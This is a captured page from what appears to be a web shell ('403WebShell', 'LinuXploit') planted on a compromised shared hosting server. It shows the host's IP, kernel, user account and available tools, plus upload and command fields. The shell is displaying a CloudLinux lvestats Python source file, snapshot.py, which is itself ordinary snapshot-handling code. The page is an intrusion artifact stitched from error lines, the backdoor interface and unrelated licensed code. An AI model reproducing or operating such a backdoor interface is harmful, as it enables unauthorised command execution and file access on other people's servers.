Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 52.14.125.137
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/thread-self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/lvestats/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/lvestats/lib/snapshot.py
# coding=utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT
import json
import logging
import os
import pwd
import shutil
import sys
import zlib
from contextlib import contextmanager
from typing import List, Optional  # NOQA

SNAPSHOT_PATH = '/var/lve/snapshots'
SNAPSHOT_EXT = '.snapshot'
SNAPSHOT_EXT_LEN = len(SNAPSHOT_EXT)


class Snapshot(object):
    """
    This class is responsible for loading and saving snapshot files for the interval
    The files will be saved in a format of: /var/lve/snapshots/[uid]/dump_time.snapshot
    dump_time is the timestamp/integer
    The directories /var/lve/snaphosts/[uid] and the dump files itself will be owned by user
    They will not be readable by other users.
    """

    def __init__(self, incident, compresslevel=1):
        # type: (dict, int) -> None
        self.compresslevel = compresslevel
        self.incident = incident
        self.log = logging.getLogger('lib-snapshot')

    def save(self, data):
        # type: (dict) -> str
        dump_date = data['dump_time']
        assert dump_date is not None

        # convert possible non-ascii data to unicode
        self._replace_unicode_data(data)
        json_compressed = zlib.compress(json.dumps(data).encode(), self.compresslevel)
        with self.create_file(dump_date) as f:
            f.write(json_compressed)
            self.log.debug('Snapshot dumped to file %s', f.name)
        return f.name

    @staticmethod
    def _to_unicode(obj):
        if isinstance(obj, bytes):
            return obj.decode('utf-8', 'replace')
        return obj

    def _replace_unicode_data(self, data):
        # type: (dict) -> None
        u_queries = []
        for query in data.get('snap_sql', []):
            u_queries.append(list(map(self._to_unicode, query)))
        data['snap_sql'] = u_queries

        u_urls = []
        for http in data.get('snap_http', []):
            u_urls.append(list(map(self._to_unicode, http)))
        data['snap_http'] = u_urls

    def get_file_list(self):
        # type: () -> List[str]
        dir_ = self.get_dir()
        if os.path.isdir(dir_):
            return os.listdir(dir_)
        return []

    def get_ts_list(self, from_ts, to_ts):
        # type: (Optional[int], Optional[int]) -> List[int]
        """
        Return ordered list of timestamps when snapshots for this use were created
        :param from_ts:
        :param to_ts:
        :return: list of timesteamps, ordered for that period
        """
        return self.snapshot_filter(self.get_file_list(), from_ts, to_ts)

    def get_snapshots(self, from_ts, to_ts):
        # type: (Optional[int], Optional[int]) -> list
        """
        Get all snapshot for a period
        :param from_ts
        :param to_ts
        :return: list of snapshots, ordered by date
        """
        result = []
        for ts in self.get_ts_list(from_ts, to_ts):
            try:
                filename = self.get_file_name(self.ts_to_name(ts))
                if not os.geteuid():
                    with drop_privileges(self.incident["uid"]):
                        content = self.read_file_content(filename)
                else:
                    content = self.read_file_content(filename)
                result.append(json.loads(content))
            except (IOError, ValueError, OSError) as ve:
                self.log.warning(
                    "Corrupted file: %s (%s)",
                    self.get_file_name(self.ts_to_name(ts)),
                    str(ve),
                )
        return result

    def read_file_content(self, filename):
        # type: (str) -> str
        with open(filename, 'rb') as f:
            content = f.read()
        try:
            content = zlib.decompress(content)
        except zlib.error:
            compressed_content = zlib.compress(content, self.compresslevel)
            with open(filename, 'wb') as f:
                f.write(compressed_content)
        return content.decode()

    def get_incident_snapshots(self):
        # type: () -> list
        """
        Load all snapshots for given incident
        :return: list of snapshots
        """
        return self.get_snapshots(self.incident["incident_start_time"], self.incident["incident_end_time"])

    def get_dir(self):
        # type: () -> str
        return os.path.join(SNAPSHOT_PATH, str(self.incident["uid"]))

    def get_file_name(self, name):
        # type: (str) -> str
        return os.path.join(self.get_dir(), name)

    def create_file(self, dump_date):
        # type: (int) -> open()
        """
        create file, change its ownership & permissions if needed. Create directories if needed as well
        :param dump_date: int timestamp used as file name
        :return: open File object
        """
        dir_ = self.get_dir()
        if not os.path.exists(dir_):
            try:  # sacrifice security if we cannot setup ownership properly
                os.makedirs(dir_)
                os.chmod(dir_, 0o751)
                os.chown(dir_, self.incident["uid"], 0)
            except (IOError, OSError) as e:
                self.log.error('Unable to create dir %s (%s)', dir_, str(e))
        file_name = self.get_file_name(self.ts_to_name(dump_date))
        with drop_privileges(self.incident["uid"]):
            file_ = open(file_name, 'wb')  # pylint: disable=consider-using-with
            try:
                os.fchmod(file_.fileno(), 0o400)
            except (IOError, OSError) as e:
                self.log.error('Unable to set file permissions %s (%s)', file_name, str(e))
        return file_

    def delete_old(self, to_ts):
        # type: (int) -> None
        """
        Delete old snapshots. If there are no more
        :param to_ts: up to which timestamp to remove snapshots
        :return: None
        """
        _dir = self.get_dir()
        files = os.listdir(_dir)
        all_snapshots = self.snapshot_filter(files)
        ts_to_remove = self.snapshot_filter(files, to_ts=to_ts)
        if all_snapshots == ts_to_remove:
            shutil.rmtree(_dir, ignore_errors=True)
        else:
            for ts in ts_to_remove:
                os.remove(self.get_file_name(self.ts_to_name(ts)))

    @staticmethod
    def get_ts(file_):
        # type: (str) -> Optional[int]
        if file_.endswith(SNAPSHOT_EXT):
            ts = file_[0:-SNAPSHOT_EXT_LEN]
            if ts.isdigit():
                try:
                    return int(ts)
                except ValueError:
                    pass
        return None

    @staticmethod
    def snapshot_filter(files, from_ts=None, to_ts=None):
        # type: (List[str], Optional[int], Optional[int]) -> List[int]
        if from_ts is None:
            from_ts = 0
        if to_ts is None:
            to_ts = sys.maxsize
        result = []
        for filename in files:
            ts = Snapshot.get_ts(filename)
            if ts is not None and from_ts <= ts <= to_ts:
                result.append(ts)
        return sorted(result)

    @staticmethod
    def ts_to_name(ts):
        # type: (int) -> str
        return str(ts) + SNAPSHOT_EXT


@contextmanager
def drop_privileges(uid):
    old_uid, old_gid, old_groups = os.getuid(), os.getgid(), os.getgroups()
    gid = pwd.getpwnam('nobody')[3]
    os.setgroups([])
    os.setegid(gid)
    os.seteuid(uid)
    try:
        yield
    finally:
        os.seteuid(old_uid)
        os.setegid(old_gid)
        os.setgroups(old_groups)

Youez - 2016 - github.com/yon3zu
LinuXploit